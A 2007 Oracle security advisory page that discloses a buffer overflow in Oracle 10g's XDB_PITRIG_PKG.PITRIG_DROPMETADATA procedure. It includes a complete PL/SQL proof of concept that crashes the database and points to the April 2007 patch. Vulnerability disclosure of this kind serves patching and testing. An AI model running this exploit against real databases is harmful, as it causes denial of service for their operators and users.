Red-Database-Security GmbH is specialized in Oracle Security

Products
Repscan 2.5
Hedgehog Enterprise
Checkpwd (free)

Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search



Search Red-Database-Security
Crash entire database via SYS.XDB_PITRIG_PKG.PITRIG_DROPMETADATA in Oracle 10g

Name Crash entire database via SYS.XDB_PITRIG_PKG.PITRIG_DROPMETADATA in Oracle 10g
Systems Affected Oracle 10g
Severity High Risk
Category Buffer Overflow
Vendor URL http://www.oracle.com/
Credit Anonymous
Exploit Full Disclosure
Date 2 Nov 2007 (V 1.00)


Details

Buffer Overflow in SYS.XDB_PITRIG_PKG.PITRIG_DROPMETADATA



Example

SQL>-- Crash Database
declare
larry varchar2(32767);
mary varchar2(32767);
begin
larry:='larryellison';
larry:=larry||larry;
larry:=larry||larry;
larry:=larry||larry;
larry:=larry||larry;
larry:=larry||larry;
larry:=larry||larry;
larry:=larry||larry;
mary:='maryann';
mary:=mary||mary;
mary:=mary||mary;
mary:=mary||mary;
mary:=mary||mary;
mary:=mary||mary;
mary:=mary||mary;
mary:=mary||mary;
mary:=mary||mary;
xDb
/*Mary*/./*And*/XDB_PITRIG_PKG/*Larry*/./**/PITRIG_DROPMETADATA(mary , larry);
end;

/


Patch Information
Apply the latest Oracle Security patches (e.g. CPU April 2007 or later)



2007 by Red-Database-Security GmbH - last update 28-nov-2007

Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.